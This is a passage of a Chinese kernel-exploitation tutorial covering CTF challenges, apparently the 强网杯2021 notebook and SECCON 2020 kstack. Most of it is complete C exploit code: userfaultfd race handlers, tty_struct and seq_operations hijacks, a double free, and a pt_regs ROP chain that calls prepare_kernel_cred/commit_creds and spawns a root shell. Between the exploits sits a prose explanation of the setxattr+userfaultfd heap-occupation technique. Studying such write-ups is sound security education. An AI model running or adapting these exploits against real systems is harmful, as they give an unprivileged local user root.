 * of read()'s byte count; the result of read() is returned as size_t.
 */
size_t note_read(int index, void *buf) {
    ssize_t rc = read(note_fd, buf, index);

    return rc;
}

/*
 * write() on the notebook device. The note index is passed in the position
 * of write()'s byte count; the result of write() is returned as size_t.
 */
size_t note_write(int index, void *buf) {
    ssize_t rc = write(note_fd, buf, index);

    return rc;
}

/*
 * userfaultfd monitor thread for the work_for_cpu_fn variant of the exploit.
 *
 * arg: the userfaultfd descriptor, cast to void * by register_userfaultfd.
 *
 * On the first page-fault event the whole exploit runs from inside this
 * handler, and only afterwards is the fault resolved with UFFDIO_COPY.
 * Any unexpected poll/read/event result terminates the process.
 *
 * The function is declared void and is handed to pthread_create through a
 * cast at the call site; the signature is left unchanged for that caller.
 */
void uaf_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        /*
         * Spray tty devices. Presumably one of the resulting tty_struct
         * objects lands in the chunk note 0 still points at -- confirm
         * against the driver.
         */
        int ptmx_fd[PTMX_NUM];
        for (int i = 0; i < PTMX_NUM; i++) {
            ptmx_fd[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        }

        /* Read note 0 back into the scratch page and dump it. */
        note_edit(0, 1024, page);
        note_read(0, page);
        qword_dump("leak tty_struct", page, 1024);

        /*
         * Word 3 of the leak is compared with its unrelocated value to get
         * the relocation offset, which is then applied to every hard-coded
         * address. (Word 3 is presumably the ops pointer: it is the slot
         * overwritten with the fake table below.)
         */
        size_t offset = page[3] - 0xffffffff81e8e440;
        commit_creds += offset;
        prepare_kernel_cred += offset;
        init_cred += offset;
        work_for_cpu_fn += offset;

        /* Fake operations table: every slot points at work_for_cpu_fn. */
        struct tty_operations tty_ops;
        for (int i = 0; i < sizeof(tty_ops) / sizeof(size_t); i++) {
            ((size_t *) &tty_ops)[i] = work_for_cpu_fn;
        }
        note_add(1, 0x50, page);
        note_edit(1, sizeof(tty_ops), page);
        note_write(1, &tty_ops);

        /*
         * Fetch the driver's note table: entry 0 is used as the address of
         * note 0 and entry 2 as the address of note 1 (the fake table).
         */
        size_t notebook[32];
        note_gift(notebook);
        qword_dump("notebook", notebook, 32 * 8);
        size_t tty_ops_addr = notebook[2];
        size_t tty_struct_addr = notebook[0];
        /* %p requires a void * argument, hence the explicit casts. */
        printf("[*] tty_ops addr: %p\n", (void *) tty_ops_addr);
        printf("[*] tty_struct addr: %p\n", (void *) tty_struct_addr);

        /*
         * Stage 1: work_for_cpu_fn calls word[4](word[5]) and stores the
         * result in word[6], so this requests prepare_kernel_cred(0).
         */
        page[4] = prepare_kernel_cred;
        page[5] = 0;
        page[3] = tty_ops_addr;
        note_write(0, page);
        for (int i = 0; i < PTMX_NUM; i++) {
            ioctl(ptmx_fd[i], 0x1145141919810);
        }

        /* Stage 2: feed the stored result (word 6) to commit_creds. */
        note_read(0, page);
        page[4] = commit_creds;
        page[5] = page[6];
        note_write(0, page);
        for (int i = 0; i < PTMX_NUM; i++) {
            ioctl(ptmx_fd[i], 0x1145141919810);
        }

        /* Alternative single-stage variant, kept for reference: commit_creds(init_cred). */
//        page[4] = commit_creds;
//        page[5] = init_cred;
//        page[3] = tty_ops_addr;
//        note_write(0, page);
//        for (int i = 0; i < PTMX_NUM; i++) {
//            ioctl(ptmx_fd[i], 0x1145141919810);
//        }

        system("/bin/sh");

        /* Resolve the pending fault by copying the scratch page into place. */
        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (size_t) page;
        uffdio_copy.dst = (size_t) msg.arg.pagefault.address & ~(page_size - 1);
        printf("[*] uffdio_copy.src: %p\n", (void *) (size_t) uffdio_copy.src);
        printf("[*] uffdio_copy.dst: %p\n", (void *) (size_t) uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
    }
}

/*
 * Entry point of the work_for_cpu_fn variant.
 *
 * Prepares the scratch page and note 0, then issues a note_edit whose user
 * buffer is a userfaultfd-registered mapping so that uaf_thread runs while
 * that ioctl is in flight.
 */
int main() {
    const int prot = PROT_READ | PROT_WRITE;
    const int flags = MAP_PRIVATE | MAP_ANONYMOUS;

    bind_core(0);

    /* Scratch page shared with the fault handler through the global `page`. */
    page_size = getpagesize();
    page = (size_t *) mmap(NULL, page_size, prot, flags, -1, 0);
    memset(page, 0, page_size);

    note_fd = open("/dev/notebook", O_RDWR);
    if (note_fd < 0) {
        puts("[-] Failed to open notebook.");
        exit(-1);
    }

    /* Create note 0, then resize it to TTY_STRUCT_SIZE. */
    note_add(0, 0x50, page);
    note_edit(0, TTY_STRUCT_SIZE, page);

    /*
     * Never-touched mapping watched by userfaultfd. Presumably the driver's
     * copy from this buffer raises the fault that uaf_thread services --
     * confirm against the driver.
     */
    char *fault_buf = (char *) mmap(NULL, page_size, prot, flags, -1, 0);
    register_userfaultfd(fault_buf, page_size, (void *) uaf_thread);
    note_edit(0, 0x2000, fault_buf);

    return 0;
}

setxattr + userfaultfd 堆占位技术

我们通过 mmap 分配连续的两个页面，在第二个页面上启用 userfaultfd，并在第一个页面的末尾写入我们想要的数据，此时我们调用 setxattr 进行跨页面的拷贝，当 copy_from_user 拷贝到第二个页面时便会触发 userfaultfd，从而让 setxattr 的执行流程卡在此处，这样这个 object 就不会被释放掉，而是可以继续参与我们接下来的利用。

例题：SECCON 2020 kstack

附件下载链接
驱动维护一个内存块构成的链表。
内存块大小为 32 字节。

1	element = (_Element *)kmem_cache_alloc(kmalloc_caches[5], 0x6000C0LL)

链表结构如下图所示。

主要有 add 和 del 两个功能。
这里注意到 add 功能是先将申请的内存块添加到链表中，然后再 copy_from_user 写入内容；而 del 功能是先找到要删除的内存块 copy_to_user 将内容复制出来再将其从链表中取出并释放掉。
也就是说，无论是 copy_from_user 还是 copy_to_user，执行时要操作的内存块都仍然在链表中，此时借助 userfaultfd 可以再次对其进行 del 操作，从而构造出 UAF 和 double free 。
因此漏洞利用思路如下：

泄露内核地址
首先申请一个 seq_operations 并将其释放，然后通过 add 将这块刚释放的内存重新申请出来；在 add 的 copy_from_user 处借助 userfaultfd 卡住执行流，此时调用 del 删掉已经加入链表的该内存块，del 中的 copy_to_user 会把其中残留的 seq_operations 函数指针拷贝到用户态，从而泄露出内核地址。
构造 double free
add 一个内存块然后将其 del ，在 copy_to_user 处通过 userfaultfd 利用 del 将其释放，userfaultfd 完成缺页处理后再次释放造成 double free 。
setxattr + userfaultfd 堆占位提权
构造 double free 之后先是申请 seq_operations ，之后再 setxattr 申请同一个内存块。利用 userfaultfd 编辑 seq_operations 修改 start 函数指针为指向 add rsp val; gadget 将栈迁移到 pt_regs 结构体上提前布置好的 ROP 上完成提权。

这里需要注意的一点是，前面 double free 的内存块申请出来后，freelist 已经被破坏，直接获取 shell 会造成 kernel panic ，因此需要先释放之前申请的一些内存块来供后面的使用。
另外 userfaultfd 处理完缺页错误之后最好直接 return 结束循环，不然会出现一些奇怪的问题，比如泄露内核地址后没有及时 return，会导致 double free 的内存块在第二次申请时申请不出来。

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <pthread.h>
#include <linux/userfaultfd.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <poll.h>
#include <stdbool.h>
#include <sys/xattr.h>

/*
 * Kernel addresses before relocation; hijack_thread adds kernel_offset to
 * each of them before use. Presumably taken from the challenge's vmlinux --
 * verify against the target kernel.
 */
size_t prepare_kernel_cred = 0xffffffff81069e00;
size_t commit_creds = 0xffffffff81069c10;
size_t pop_rdi_ret = 0xffffffff81034505;
size_t mov_rdi_rax_pop_rbp_ret = 0xffffffff8102d5ce;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81600a34;

/*
 * Restrict the CPU affinity of this process to the single CPU `core`.
 * The result of sched_setaffinity is not checked.
 */
void bind_core(int core) {
    cpu_set_t only_core;
    CPU_ZERO(&only_core);
    CPU_SET(core, &only_core);

    sched_setaffinity(getpid(), sizeof only_core, &only_core);
}

/* Descriptor of /proc/stack, opened in main and used by add() and del(). */
int dev_fd;

/*
 * Issue the driver's add ioctl (0x57AC0001) with user pointer `a`.
 * Prints an error and exits if the ioctl reports failure.
 */
void add(void *a) {
    int rc = ioctl(dev_fd, 0x57AC0001, a);

    if (rc >= 0) {
        return;
    }
    puts("[-] add error");
    exit(-1);
}

/*
 * Issue the driver's del ioctl (0x57AC0002) with user pointer `a`.
 * Prints an error and exits if the ioctl reports failure.
 */
void del(void *a) {
    int rc = ioctl(dev_fd, 0x57AC0002, a);

    if (rc >= 0) {
        return;
    }
    puts("[-] del error");
    exit(-1);
}

/* Scratch page mapped in main; source of every UFFDIO_COPY and target of del() in double_free_thread. */
char *page;
/* System page size as returned by getpagesize() in main. */
size_t page_size;
/* Receives the leaked pointer in leak_thread, which then turns it into the relocation offset. */
size_t kernel_offset;

/*
 * userfaultfd monitor thread used for the address leak.
 *
 * arg: the userfaultfd descriptor, cast to void * by register_userfaultfd.
 *
 * When the fault arrives, del() is called with &kernel_offset as the
 * destination, so the 8 bytes the driver copies out land in kernel_offset.
 * The unrelocated value 0xffffffff8113be80 is then subtracted to obtain the
 * relocation offset. The fault is resolved with UFFDIO_COPY and the thread
 * returns after this single event.
 *
 * The function is declared void and is handed to pthread_create through a
 * cast at the call site; the signature is left unchanged for that caller.
 */
void leak_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        puts("[*] add trapped in userfaultfd.");
        /* The driver copies the element's content into kernel_offset. */
        del(&kernel_offset);

        /* %p requires a void * argument, hence the explicit cast. */
        printf("[+] leak addr: %p\n", (void *) kernel_offset);
        kernel_offset -= 0xffffffff8113be80;

        /* Resolve the pending fault by copying the scratch page into place. */
        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (unsigned long) page;
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);
        printf("[*] uffdio_copy.dst: %p\n", (void *) (size_t) uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
        /* Handle exactly one fault, then stop monitoring. */
        return;
    }
}

/*
 * userfaultfd monitor thread used to build the double free.
 *
 * arg: the userfaultfd descriptor, cast to void * by register_userfaultfd.
 *
 * When the fault arrives, a second del() is issued (with the scratch page
 * as destination) before the fault is resolved with UFFDIO_COPY. The
 * thread returns after this single event.
 *
 * The function is declared void and is handed to pthread_create through a
 * cast at the call site; the signature is left unchanged for that caller.
 */
void double_free_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        puts("[*] del trapped in userfaultfd.");
        puts("[*] construct the double free...");
        /* Second delete issued while the first one is still pending. */
        del(page);

        /* Resolve the pending fault by copying the scratch page into place. */
        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (unsigned long) page;
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);
        /* %p requires a void * argument, hence the explicit cast. */
        printf("[*] uffdio_copy.dst: %p\n", (void *) (size_t) uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
        /* Handle exactly one fault, then stop monitoring. */
        return;
    }
}

/*
 * seq_fd_reserve: 100 descriptors of /proc/self/stat opened up front in main
 *                 and closed by hijack_thread.
 * seq_fd:         descriptor of /proc/self/stat that hijack_thread issues
 *                 its final syscall on.
 */
int seq_fd_reserve[100], seq_fd;

/*
 * userfaultfd monitor thread for the final control-flow hijack.
 *
 * arg: the userfaultfd descriptor, cast to void * by register_userfaultfd.
 *
 * When the fault arrives, the handler closes the reserved descriptors,
 * relocates the gadget addresses with kernel_offset, loads them into
 * general-purpose registers and issues a syscall on seq_fd. The pending
 * fault is never resolved here (no UFFDIO_COPY).
 *
 * NOTE(review): the inline assembly uses Intel operand order and refers to
 * globals by name; presumably the file is built with -masm=intel -- confirm
 * the build flags.
 */
void *hijack_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        puts("[*] setxattr trapped in userfaultfd.");
        /* Release the descriptors opened up front in main. */
        for (int i = 0; i < 100; i++) {
            close(seq_fd_reserve[i]);
        }

        /* Relocate every gadget / function address. */
        pop_rdi_ret += kernel_offset;
        mov_rdi_rax_pop_rbp_ret += kernel_offset;
        prepare_kernel_cred += kernel_offset;
        commit_creds += kernel_offset;
        /* The extra 0x10 enters the routine part-way; presumably it skips its leading instructions -- confirm in the disassembly. */
        swapgs_restore_regs_and_return_to_usermode += kernel_offset + 0x10;

        /*
         * Load the chain into registers, then issue syscall number 0
         * (rax is zeroed) with rdi = seq_fd, rsi = rsp, rdx = 8.
         * r13, r12, rbp, rbx, r10 and r9 carry the meaningful entries;
         * the remaining constants are recognisable filler values.
         */
        __asm__(
                "mov r15,   0xbeefdead;"
                "mov r14,   0x11111111;"
                "mov r13,   pop_rdi_ret;"
                "mov r12,   0;"
                "mov rbp,   prepare_kernel_cred;"
                "mov rbx,   mov_rdi_rax_pop_rbp_ret;"
                "mov r11,   0x66666666;"
                "mov r10,   commit_creds;"
                "mov r9,    swapgs_restore_regs_and_return_to_usermode;"
                "mov r8,    0x99999999;"
                "xor rax,   rax;"
                "mov rcx,   0xaaaaaaaa;"
                "mov rdx,   8;"
                "mov rsi,   rsp;"
                "mov rdi,   seq_fd;"
                "syscall");

        puts("[+] back to userland successfully!");

        printf("[+] uid: %d gid: %d\n", getuid(), getgid());

        puts("[*] execve root shell now...");
        system("/bin/sh");
    }
}

/*
 * Create a userfaultfd, register [addr, addr + len) for missing-page faults
 * and start `handler` in a new thread.
 *
 * addr, len: range to watch.
 * handler:   thread routine; it receives the userfaultfd descriptor cast to
 *            void *.
 *
 * Any failing step prints a message and terminates the process. The thread
 * handle is kept in static storage and is never joined here.
 */
void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
    static pthread_t monitor_thread;
    int rc;

    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("[-] Error at: userfaultfd");
        exit(-1);
    }

    /* API handshake must precede any other userfaultfd ioctl. */
    struct uffdio_api api_req = {.api = UFFD_API, .features = 0};
    rc = ioctl((int) uffd, UFFDIO_API, &api_req);
    if (rc == -1) {
        puts("[-] Error at: ioctl-UFFDIO_API");
        exit(-1);
    }

    struct uffdio_register reg_req;
    reg_req.range.start = (unsigned long) addr;
    reg_req.range.len = len;
    reg_req.mode = UFFDIO_REGISTER_MODE_MISSING;
    rc = ioctl((int) uffd, UFFDIO_REGISTER, &reg_req);
    if (rc == -1) {
        puts("[-] Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }

    rc = pthread_create(&monitor_thread, NULL, handler, (void *) uffd);
    if (rc != 0) {
        puts("[-] Error at: pthread_create");
        exit(-1);
    }
}

/*
 * Entry point of the kstack exploit. It runs three userfaultfd-assisted
 * phases in order:
 *
 *   1. leak:        add() with a watched buffer; leak_thread fills in
 *                   kernel_offset while add() is blocked.
 *   2. double free: del() with a watched buffer; double_free_thread issues
 *                   a second del() while the first is blocked.
 *   3. hijack:      setxattr() with a value that straddles into a watched
 *                   page; hijack_thread takes over from there.
 *
 * Any failing open() prints a message and terminates the process.
 */
int main() {
    bind_core(0);

    if ((dev_fd = open("/proc/stack", O_RDONLY)) < 0) {
        puts("[-] open kstack error.");
        exit(-1);
    }

    /* Scratch page: UFFDIO_COPY source for every handler. */
    page_size = getpagesize();
    page = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    /* Descriptors opened up front; hijack_thread closes them again. */
    for (int i = 0; i < 100; i++) {
        if ((seq_fd_reserve[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
            puts("[-] open seq_operation error.");
            exit(-1);
        }
    }

    /* Phase 1: leak. */
    void *leak_uffd_buf = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    register_userfaultfd(leak_uffd_buf, page_size, (void *) leak_thread);

    if ((seq_fd = open("/proc/self/stat", O_RDONLY)) < 0) {
        puts("[-] open seq_operation error.");
        exit(-1);
    }

    /* Open-then-close right before add(); the add() below uses the watched buffer. */
    close(seq_fd);
    add(leak_uffd_buf);

    /* %p requires a void * argument, hence the explicit cast. */
    printf("[+] kernel offset: %p\n", (void *) kernel_offset);

    /* Phase 2: double free. */
    void *uaf_uffd_buf = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    register_userfaultfd(uaf_uffd_buf, page_size, (void *) double_free_thread);

    add("aaa");
    del(uaf_uffd_buf);

    /*
     * Phase 3: two adjacent pages, only the second one watched. The last
     * 8 bytes of the first page hold a relocated kernel address
     * (presumably the stack-adjusting gadget -- confirm against the
     * target kernel).
     */
    char *hijack_uffd_buf = (char *) mmap(NULL, page_size * 2, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    register_userfaultfd(hijack_uffd_buf + page_size, page_size, (void *) hijack_thread);
    *(size_t *) (hijack_uffd_buf + page_size - 8) = 0xffffffff814d51c0 + kernel_offset;

    if ((seq_fd = open("/proc/self/stat", O_RDONLY)) < 0) {
        puts("[-] open seq_operation error.");
        exit(-1);
    }

    /* 32-byte value starting 8 bytes before the watched page, so it crosses the boundary. */
    setxattr("/exp", page, hijack_uffd_buf + page_size - 8, 32, 0);

    return 0;
}

linux kernel pwn 内核利用

NULL Pointer Dereference

Kernel Stack Buffer Overflow

ret2user

kernel rop

kernel rop + ret2user

利用 pt_regs 构造 kernel ROP

ret2dir

例题：MINI-LCTF2022 - kgadget

Kernel Heap Exploit

Use After Free

修改 cred

利用 tty_struct 劫持程序控制流提权

Heap Overflow

修改 cred

堆溢出 + 堆喷射覆写 seq_operations 控制内核执行流

Off By Null

例题：corCTF2022 corjail（kmalloc-4k）

例题：D^3CTF2023 d3kcache

Arbitrary Address Allocation

例题：RWCTF2022高校赛 - Digging into kernel 1 & 2

Arbitrary Address Free（Only Heap Address）

Kernel Unlink

simple_xattr

Page-level Heap Fengshui

例题：corCTF2022 - cache-of-castaways

Race condition

double fetch

例题：2018 0CTF Finals Baby Kernel

userfaultfd

例题：D^3CTF2019 - knote

例题：强网杯2021 notebook

setxattr + userfaultfd 堆占位技术

例题：SECCON 2020 kstack